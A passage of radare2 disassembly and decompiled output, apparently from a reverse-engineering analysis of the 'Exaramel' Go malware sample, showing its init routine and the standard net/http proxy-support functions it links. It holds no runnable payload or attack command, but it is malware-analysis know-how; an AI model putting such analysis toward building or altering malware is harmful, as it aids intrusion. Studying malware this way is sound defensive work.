<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a7e</span> &nbsp; &nbsp; &nbsp;mov byte <span class="br0">&#91;</span>obj<span class="sy0">.</span>main<span class="sy0">.</span>initdone<span class="sy0">.</span><span class="br0">&#93;</span><span class="sy0">,</span> <span class="nu0">2</span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="sy0">;</span> <span class="br0">&#91;</span><span class="nu0">0x843374</span><span class="sy0">:</span><span class="nu0">1</span><span class="br0">&#93;</span><span class="sy0">=</span><span class="nu0">0</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a85</span> &nbsp; &nbsp; &nbsp;mov rbp<span class="sy0">,</span> qword <span class="br0">&#91;</span>rsp<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a89</span> &nbsp; &nbsp; &nbsp;add rsp<span class="sy0">,</span> <span class="nu0">8</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a8d</span> &nbsp; &nbsp; &nbsp;ret</div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="sy0">;</span> CODE XREF from sym<span class="sy0">.</span>main<span class="sy0">.</span>init @ <span class="nu0">0x6489fd</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a8e</span> &nbsp; &nbsp; &nbsp;<span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>morestack_noctxt &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">3</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">\ &nbsp; &nbsp; &nbsp; `<span class="sy0">=&lt;</span> <span class="nu0">0x00648a93</span> &nbsp; &nbsp; &nbsp;jmp sym<span class="sy0">.</span>main<span class="sy0">.</span>init</div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x00648a98</span> &nbsp; &nbsp; &nbsp;int3</div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x00648a99</span> &nbsp; &nbsp; &nbsp;int3</div></li>
<li class="li1"><div class="de1"><span class="co1">--- more ---</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp;<span class="sy0">:</span></div></li>
<li class="li1"><div class="de1"><span class="br0">&#91;</span><span class="nu0">0x00648a23</span> <span class="br0">&#91;</span>xAdvc<span class="br0">&#93;</span><span class="nu0">0</span> <span class="nu0">0</span><span class="sy0">%</span> <span class="nu0">180</span> Exaramel<span class="br0">&#93;</span><span class="sy0">&gt;</span> pd $r @ sym<span class="sy0">.</span>main<span class="sy0">.</span>init<span class="sy0">+</span><span class="nu0">51</span> <span class="sy0">#</span> <span class="nu0">0x648a23</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="sy0">;</span> CODE XREF from sym<span class="sy0">.</span>main<span class="sy0">.</span>init @ <span class="nu0">0x648a18</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp;<span class="sy0">,==&lt;</span> <span class="nu0">0x00648a23</span> &nbsp; &nbsp; &nbsp;<span class="nu0">7507</span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; jne <span class="nu0">0x648a2c</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp;|<span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a25</span> &nbsp; &nbsp; &nbsp;e896e8ddff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>throwinit &nbsp;<span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">1</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp;|<span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a2a</span> &nbsp; &nbsp; &nbsp;0f0b &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ud2</div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp;|<span class="sy0">:</span> &nbsp; <span class="sy0">;</span> CODE XREF from sym<span class="sy0">.</span>main<span class="sy0">.</span>init @ <span class="nu0">0x648a23</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp;`<span class="co1">--&gt; 0x00648a2c &nbsp; &nbsp; &nbsp;c60541a91f00. &nbsp;mov byte [obj.main.initdone.], 1 &nbsp; &nbsp;; [0x843374:1]=0</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a33</span> &nbsp; &nbsp; &nbsp;e8d837e9ff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span>app_vendor_configur<span class="sy0">.</span>init <span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">2</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a38</span> &nbsp; &nbsp; &nbsp;e82310e7ff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span>fmt<span class="sy0">.</span>init &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">3</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a3d</span> &nbsp; &nbsp; &nbsp;e89e48e9ff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span>math_rand<span class="sy0">.</span>init &nbsp; &nbsp; <span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">4</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a42</span> &nbsp; &nbsp; &nbsp;e8896becff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span>net<span class="sy0">.</span>init &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">5</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a47</span> &nbsp; &nbsp; &nbsp;e804bcfcff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span>app_vendor_network<span class="sy0">.</span>init <span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">6</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a4c</span> &nbsp; &nbsp; &nbsp;e8efdde4ff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span><span class="kw3">os</span><span class="sy0">.</span>init &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">7</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a51</span> &nbsp; &nbsp; &nbsp;e86ad3fcff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span>os_signal<span class="sy0">.</span>init &nbsp; &nbsp; <span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">8</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a56</span> &nbsp; &nbsp; &nbsp;e8e51ce9ff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span>path_filepath<span class="sy0">.</span>init <span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">9</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a5b</span> &nbsp; &nbsp; &nbsp;e8b02cfdff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span>app_vendor_scheduler<span class="sy0">.</span>init <span class="sy0">;</span><span class="br0">&#91;</span>?<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a60</span> &nbsp; &nbsp; &nbsp;e8cbd8e1ff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span>strconv<span class="sy0">.</span>init &nbsp; &nbsp; &nbsp; <span class="sy0">;</span><span class="br0">&#91;</span>?<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a65</span> &nbsp; &nbsp; &nbsp;e8b6afe7ff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span>strings<span class="sy0">.</span>init &nbsp; &nbsp; &nbsp; <span class="sy0">;</span><span class="br0">&#91;</span>?<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a6a</span> &nbsp; &nbsp; &nbsp;e80172e3ff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span>syscall<span class="sy0">.</span>init &nbsp; &nbsp; &nbsp; <span class="sy0">;</span><span class="br0">&#91;</span>?<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a6f</span> &nbsp; &nbsp; &nbsp;e83c6ee4ff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span><span class="kw3">time</span><span class="sy0">.</span>init &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="sy0">;</span><span class="br0">&#91;</span>?<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a74</span> &nbsp; &nbsp; &nbsp;e857d7ffff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span>app_vendor_worker<span class="sy0">.</span>init <span class="sy0">;</span><span class="br0">&#91;</span>?<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a79</span> &nbsp; &nbsp; &nbsp;e8f2e6ffff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span>app_vendor_github<span class="sy0">.</span>com_satori_go_2euuid<span class="sy0">.</span>init <span class="sy0">;</span><span class="br0">&#91;</span>?<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a7e</span> &nbsp; &nbsp; &nbsp;c605efa81f00<span class="sy0">.</span> &nbsp;mov byte <span class="br0">&#91;</span>obj<span class="sy0">.</span>main<span class="sy0">.</span>initdone<span class="sy0">.</span><span class="br0">&#93;</span><span class="sy0">,</span> <span class="nu0">2</span> &nbsp; &nbsp;<span class="sy0">;</span> <span class="br0">&#91;</span><span class="nu0">0x843374</span><span class="sy0">:</span><span class="nu0">1</span><span class="br0">&#93;</span><span class="sy0">=</span><span class="nu0">0</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a85</span> &nbsp; &nbsp; &nbsp;488b2c24 &nbsp; &nbsp; &nbsp; mov rbp<span class="sy0">,</span> qword <span class="br0">&#91;</span>rsp<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a89</span> &nbsp; &nbsp; &nbsp;4883c408 &nbsp; &nbsp; &nbsp; add rsp<span class="sy0">,</span> <span class="nu0">8</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a8d</span> &nbsp; &nbsp; &nbsp;c3 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ret</div></li>
<li class="li1"><div class="de1"><span class="co1">--- more ---</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp;<span class="sy0">:</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="kw1">if</span> <span class="br0">&#40;</span><span class="nu0">1</span> <span class="sy0">&lt;</span> <span class="br0">&#40;</span>uint8_t<span class="br0">&#41;</span>obj<span class="sy0">.</span>main<span class="sy0">.</span>initdone<span class="sy0">.</span><span class="br0">&#41;</span> <span class="br0">&#123;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">return</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="br0">&#125;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="kw1">if</span> <span class="br0">&#40;</span>obj<span class="sy0">.</span>main<span class="sy0">.</span>initdone<span class="sy0">.</span> <span class="sy0">==</span> <span class="br0">&#40;</span>code<span class="br0">&#41;</span><span class="nu0">0x1</span><span class="br0">&#41;</span> <span class="br0">&#123;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; sym<span class="sy0">.</span>runtime<span class="sy0">.</span>throwinit<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">do</span> <span class="br0">&#123;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; invalidInstructionException<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="br0">&#125;</span> <span class="kw1">while</span><span class="br0">&#40;</span> <span class="kw4">true</span> <span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="br0">&#125;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; obj<span class="sy0">.</span>main<span class="sy0">.</span>initdone<span class="sy0">.</span> <span class="sy0">=</span> <span class="br0">&#40;</span>code<span class="br0">&#41;</span><span class="nu0">0x1</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>app_vendor_configur<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>fmt<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>math_rand<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>net<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>app_vendor_network<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span><span class="kw3">os</span><span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>os_signal<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>path_filepath<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>app_vendor_scheduler<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>strconv<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>strings<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>syscall<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span><span class="kw3">time</span><span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>app_vendor_worker<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>app_vendor_github<span class="sy0">.</span>com_satori_go_2euuid<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; obj<span class="sy0">.</span>main<span class="sy0">.</span>initdone<span class="sy0">.</span> <span class="sy0">=</span> <span class="br0">&#40;</span>code<span class="br0">&#41;</span><span class="nu0">0x2</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="kw1">return</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1"><span class="br0">&#125;</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> proxy supported<span class="sy0">..</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005f8bc0</span> &nbsp; <span class="nu0">42</span> <span class="nu0">1298</span> &nbsp; &nbsp; &nbsp; &nbsp; sym<span class="sy0">.</span>net_http<span class="sy0">.</span>ProxyFromEnvironment</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005f90e0</span> &nbsp; &nbsp;<span class="nu0">6</span> <span class="nu0">141</span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;sym<span class="sy0">.</span>net_http<span class="sy0">.</span>ProxyURL</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fad00</span> &nbsp; &nbsp;<span class="nu0">7</span> <span class="nu0">248</span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;sym<span class="sy0">.</span>net_http<span class="sy0">.</span>__connectMethod_<span class="sy0">.</span>proxyAuth</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005ffa30</span> &nbsp; <span class="nu0">67</span> <span class="nu0">1631</span> &nbsp; &nbsp; &nbsp; &nbsp; sym<span class="sy0">.</span>net_http<span class="sy0">.</span>useProxy</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00607600</span> &nbsp; &nbsp;<span class="nu0">1</span> <span class="nu0">28</span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; sym<span class="sy0">.</span>net_http<span class="sy0">.</span>ProxyURL<span class="sy0">.</span>func1</div></li>
<li class="li1"><div class="de1"><span class="co1">--- more ---</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp;<span class="sy0">:</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0x9788ea</span> <span class="nu0">36</span> <span class="nu0">35</span> net<span class="sy0">/</span>http<span class="sy0">.</span><span class="br0">&#40;</span><span class="sy0">*</span>connectMethod<span class="br0">&#41;</span><span class="sy0">.</span>proxyAuth</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x97961f</span> <span class="nu0">18</span> <span class="nu0">17</span> net<span class="sy0">/</span>http<span class="sy0">.</span>useProxy</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x97b757</span> <span class="nu0">24</span> <span class="nu0">23</span> net<span class="sy0">/</span>http<span class="sy0">.</span>ProxyURL<span class="sy0">.</span>func1</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x9dbc43</span> <span class="nu0">22</span> <span class="nu0">21</span> net<span class="sy0">/</span>http<span class="sy0">.</span>httpProxyEnv</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x9dbc6d</span> <span class="nu0">23</span> <span class="nu0">22</span> net<span class="sy0">/</span>http<span class="sy0">.</span>httpsProxyEnv</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x9dc038</span> <span class="nu0">20</span> <span class="nu0">19</span> net<span class="sy0">/</span>http<span class="sy0">.</span>noProxyEnv</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x768d</span> &nbsp; <span class="nu0">22</span> <span class="nu0">21</span> net<span class="sy0">/</span>http<span class="sy0">.</span>httpProxyEnv</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x76a3</span> &nbsp; <span class="nu0">23</span> <span class="nu0">22</span> net<span class="sy0">/</span>http<span class="sy0">.</span>httpsProxyEnv</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x78de</span> &nbsp; <span class="nu0">20</span> <span class="nu0">19</span> net<span class="sy0">/</span>http<span class="sy0">.</span>noProxyEnv</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x2e857</span> &nbsp;<span class="nu0">30</span> <span class="nu0">29</span> net<span class="sy0">/</span>http<span class="sy0">.</span>ProxyFromEnvironment</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x2e875</span> &nbsp;<span class="nu0">18</span> <span class="nu0">17</span> net<span class="sy0">/</span>http<span class="sy0">.</span>ProxyURL</div></li>
<li class="li1"><div class="de1"><span class="co1">--- more ---</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp;<span class="sy0">:</span></div></li>
<li class="li1"><div class="de1">void sym<span class="sy0">.</span>net_http<span class="sy0">.</span>__connectMethod_<span class="sy0">.</span>proxyAuth<span class="br0">&#40;</span>undefined8 param_1<span class="sy0">,</span> undefined8 param_2<span class="sy0">,</span> int64_t param_3<span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1"><span class="br0">&#123;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; uint64_t <span class="sy0">*</span>puVar1<span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; int64_t extraout_RDX<span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; int64_t in_FS_OFFSET<span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; int64_t <span class="sy0">*</span>in_stack_00000008<span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; undefined8 in_stack_00000010<span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; undefined8 in_stack_00000018<span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="kw1">while</span> <span class="br0">&#40;</span>puVar1 <span class="sy0">=</span> <span class="br0">&#40;</span>uint64_t <span class="sy0">*</span><span class="br0">&#41;</span><span class="br0">&#40;</span><span class="sy0">*</span><span class="br0">&#40;</span>int64_t <span class="sy0">*</span><span class="br0">&#41;</span><span class="br0">&#40;</span>in_FS_OFFSET <span class="sy0">+</span> <span class="nu0">0xfffffff8</span><span class="br0">&#41;</span> <span class="sy0">+</span> <span class="nu0">0x10</span><span class="br0">&#41;</span><span class="sy0">,</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="sy0">*</span><span class="br0">&#40;</span>BADSPACEBASE <span class="sy0">**</span><span class="br0">&#41;</span><span class="nu0">0x20</span> <span class="sy0">&lt;</span> <span class="br0">&#40;</span>undefined <span class="sy0">*</span><span class="br0">&#41;</span><span class="sy0">*</span>puVar1 || <span class="br0">&#40;</span>undefined <span class="sy0">*</span><span class="br0">&#41;</span><span class="sy0">*</span><span class="br0">&#40;</span>BADSPACEBASE <span class="sy0">**</span><span class="br0">&#41;</span><span class="nu0">0x20</span> <span class="sy0">==</span> <span class="br0">&#40;</span>undefined <span class="sy0">*</span><span class="br0">&#41;</span><span class="sy0">*</span>puVar1<span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="br0">&#123;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; sym<span class="sy0">.</span>runtime<span class="sy0">.</span>morestack_noctxt<span class="br0">&#40;</span>param_1<span class="sy0">,</span> param_2<span class="sy0">,</span> param_3<span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; param_3 <span class="sy0">=</span> extraout_RDX<span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="br0">&#125;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="kw1">if</span> <span class="br0">&#40;</span><span class="sy0">*</span>in_stack_00000008 !<span class="sy0">=</span> <span class="nu0">0</span><span class="br0">&#41;</span> <span class="br0">&#123;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">if</span> <span class="br0">&#40;</span><span class="sy0">*</span><span class="br0">&#40;</span>int64_t <span class="sy0">*</span><span class="br0">&#41;</span><span class="br0">&#40;</span><span class="sy0">*</span>in_stack_00000008 <span class="sy0">+</span> <span class="nu0">0x20</span><span class="br0">&#41;</span> !<span class="sy0">=</span> <span class="nu0">0</span><span class="br0">&#41;</span> <span class="br0">&#123;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; sym<span class="sy0">.</span>net_http<span class="sy0">.</span>basicAuth<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; sym<span class="sy0">.</span>runtime<span class="sy0">.</span>concatstring2<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">return</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="br0">&#125;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">return</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="br0">&#125;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="kw1">return</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1"><span class="br0">&#125;</span></div></li>
<li class="li1"><div class="de1"><span class="co1">--- more ---</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp;<span class="sy0">:</span></div></li>
<li class="li1"><div class="de1">&nbsp;<span class="sy0">;</span> CODE XREF from sym<span class="sy0">.</span>net_http<span class="sy0">.</span>__connectMethod_<span class="sy0">.</span>proxyAuth @ <span class="nu0">0x5fadf3</span></div></li>
<li class="li1"><div class="de1">&nbsp;<span class="sy0">;</span> CALL XREFS from sym<span class="sy0">.</span>net_http<span class="sy0">.</span>__Transport_<span class="sy0">.</span>dialConn @ <span class="nu0">0x5fe1b1</span><span class="sy0">,</span> <span class="nu0">0x5ff325</span></div></li>
<li class="li1"><div class="de1">&nbsp;<span class="sy0">;</span><span class="co1">-- sym.go.net_http.__connectMethod_.proxyAuth:</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">/</span> <span class="nu0">248</span><span class="sy0">:</span> sym<span class="sy0">.</span>net_http<span class="sy0">.</span>__connectMethod_<span class="sy0">.</span>proxyAuth <span class="br0">&#40;</span>int64_t arg_8h<span class="sy0">,</span> int64_t arg_10h<span class="sy0">,</span> int64_t arg_18h<span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">| bp<span class="sy0">:</span> <span class="nu0">0</span> <span class="br0">&#40;</span>vars <span class="nu0">0</span><span class="sy0">,</span> args <span class="nu0">0</span><span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">| sp<span class="sy0">:</span> <span class="nu0">10</span> <span class="br0">&#40;</span>vars <span class="nu0">7</span><span class="sy0">,</span> args <span class="nu0">3</span><span class="br0">&#41;</span></div></li>
